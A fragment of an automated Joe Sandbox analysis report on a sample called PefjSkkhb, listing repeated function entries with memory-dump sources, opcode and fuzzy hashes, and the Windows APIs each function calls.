                                                                      • Instruction ID: d97931a4b05faa292b3b780303681f5d0b168880c81017e5e0f6d5f496406c16
                                                                      • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                      • Instruction Fuzzy Hash: 37217932A18B4187D710AF26F54096EB3A4FB48BA4B841531EB8D83B54DF39F5548B90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction ID: 24073eae3cb2acd9ec9ea46bd300fa1373cff1ebb2fa09de2b769a0abac4d1de
                                                                      • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                      • Instruction Fuzzy Hash: 4CE01220B4974682EB05BF645C4D27653526F44B61FC25038C80E82392CF7DF45883A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: d160297c5552d2b324480a32c3c61f515c788882e65b381496383ee351572f70
                                                                      • Instruction ID: 78b9e2fd32f1fb6a4136a9a36da25b550c978e03578119f89642b6a7d4f80a94
                                                                      • Opcode Fuzzy Hash: d160297c5552d2b324480a32c3c61f515c788882e65b381496383ee351572f70
                                                                      • Instruction Fuzzy Hash: DC228876B58A46CAEB10FF64E0402ACA7A5FB44BA8F804536DE4D97795CF38F445C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction ID: 876253392bd8db8f49b104d52b4c8c5392cea00cc4014e0ee6719e4e646f3414
                                                                      • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                      • Instruction Fuzzy Hash: 80419D32A8CA4282E764BF20E405379B7A4EB45BB8F844634DA6D877C9DF7DF4448790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                      • Instruction ID: 1a78aacaf7b4e91586f8b149c57833d43d6a579d531ad7f76e10c34d4154fd33
                                                                      • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                      • Instruction Fuzzy Hash: 9E413B22B54A5286EB10FF25D4513FCA3A4EB44BACF844531EA4D87799DF3CE844C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction ID: 1eec2158999694948bfa21cb0ce465f751d79808ac536caaf5237f711ca68350
                                                                      • Opcode Fuzzy Hash: 75f4a0e65c200bc2e40f9fd9660e43366a6e6660fa9f53215bc3a0a6d933da49
                                                                      • Instruction Fuzzy Hash: B6415C32909B4586E751EF11E4443A9B7A8FB48BA8F840535DE4C87759CF7CE590C7A0
                                                                      APIs
                                                                      • IsThemeActive.UXTHEME ref: 00007FF7C0E53756
                                                                        • Part of subcall function 00007FF7C0E79334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E79348
                                                                        • Part of subcall function 00007FF7C0E536E8: SystemParametersInfoW.USER32 ref: 00007FF7C0E53705
                                                                        • Part of subcall function 00007FF7C0E536E8: SystemParametersInfoW.USER32 ref: 00007FF7C0E53725
                                                                        • Part of subcall function 00007FF7C0E537B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E537F2
                                                                        • Part of subcall function 00007FF7C0E537B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53807
                                                                        • Part of subcall function 00007FF7C0E537B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E5388D
                                                                        • Part of subcall function 00007FF7C0E537B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53924
                                                                      • SystemParametersInfoW.USER32 ref: 00007FF7C0E53797
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4207566314-0
                                                                      • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction ID: e3fa117fec415b1676ebd072388911a1797d12ee35e2a93b0b654cc85ed83d58
                                                                      • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                      • Instruction Fuzzy Hash: 0A0124B0E4C6469AF300FFA1A814976A6A1AF08720FC40036D94CC63A2CF7CB4C487A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast
                                                                      • String ID:
                                                                      • API String ID: 485612231-0
                                                                      • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction ID: 3011eda5499fd31c0428dfd30197d32c088861779af7c20992d73d502c989b39
                                                                      • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                      • Instruction Fuzzy Hash: 6BE08611E8D58382FF057FB69808075A6926F44B74FC44134C80DC6351DF6CF4858BA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast
                                                                      • String ID:
                                                                      • API String ID: 918212764-0
                                                                      • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction ID: 2ff7572f1a5b0ab4870ade05ee070782eeb0707f293361618b09eceb2eee57a8
                                                                      • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                      • Instruction Fuzzy Hash: A511B951B4C38245FEA47F64A5942BD92C25F94774FC40235DA2EC63D2DF6DF88483A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                      • Instruction ID: 3db2d3cecf466f877d61c4ea65f154a9a3d44324b28053638d158e9e1577952a
                                                                      • Opcode Fuzzy Hash: e869654350b1d585ac28b73911299a849cdf7de5e5dd263a2f3101a0d6b2730c
                                                                      • Instruction Fuzzy Hash: 6A32D226A4CA8685EB65FF15E4402B9E761EB85FA4F884132DE0D87791CF3CF451C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                      • Instruction ID: 58d5d1f9b051bcfb75cb899d9591f73030bc202d98abbf6967a4c25667fcf37a
                                                                      • Opcode Fuzzy Hash: 2f2a7f0b4b99b489bd401bf82ee2ae899ba245d3bdd8c743c662dd8b12cd4bc5
                                                                      • Instruction Fuzzy Hash: 9C417A26B49A4586FB11FF65D0403ACA3A4EB84BA8F844535CE0DAB785CF7CF485C3A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                      • String ID:
                                                                      • API String ID: 3947729631-0
                                                                      • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                      • Instruction ID: 4457c046f12f5d1f71b42e00580928bd88ece1dd83d30243f7f478e878a21abd
                                                                      • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                      • Instruction Fuzzy Hash: 1D41BF31A5C66282FA64BF19D554178A251AF90B74F844035DA0EC77D1DF3DF88583E0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                      • Instruction ID: e136c9f8f79924bd439ae03f22fe109a8d0174d668846babd83f03434636ccda
                                                                      • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                      • Instruction Fuzzy Hash: 5A219562A4C6C281EA55BF19940017ED3A4FF45BA4F944231FA4CD7B96DF7CF84187A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                      • Instruction ID: d149811a025c2a1e4eea93b44331c280962f5ad7ae49b883b9a665d9e376e14b
                                                                      • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                      • Instruction Fuzzy Hash: 3021D83271878247E765BF29E4403B9B6A4EB80BA4F544235DA6DCB7D5DF2CE800CB50
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                      • Instruction ID: 8d6399a5151421da45c96b3eb006a9c00a5b7b29603a88004892ac5e4f777c52
                                                                      • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                      • Instruction Fuzzy Hash: 0F112B27659B4581EB44BF16D49036DA360EB84FE4F985132DA1E873A1CF3CE490C390
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                      • Instruction ID: ade4d3dedd3efc10160cb9d12b6a53d2e8d61adb1898d910b6a014e37566d6fc
                                                                      • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                      • Instruction Fuzzy Hash: 0A118F7294C6868AEA15BF54D4402ADF761EB80774FD04232E65D8A3E6CFBCF004CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                      • Instruction ID: 875fd62964934891a2243ea7cd382f84173997bc2b734ceae9e07058d9a0393c
                                                                      • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                      • Instruction Fuzzy Hash: 84018F61E8828741FE24BEAE941137A92509F95774FA51330EA2DCA3D3CF2CF84183A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3215553584-0
                                                                      • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                      • Instruction ID: a3b2e24ba6cf47a5f5edc993bb7239a71dca16d02c99b7173a448bbbbf59b00a
                                                                      • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                      • Instruction Fuzzy Hash: 43F09021A8C28342E929BF6DA44117AA394AF81774FA41330E95EC63C6CF2CF44187A1
                                                                      APIs
                                                                        • Part of subcall function 00007FF7C0E84970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E84999
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF7C0E9C8FE), ref: 00007FF7C0E5656F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 3938577545-0
                                                                      • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                      • Instruction ID: 0c45ad8b0f11aaf7728efa05fe95e3e330d16bb63b7900d2dc387a828ddf6394
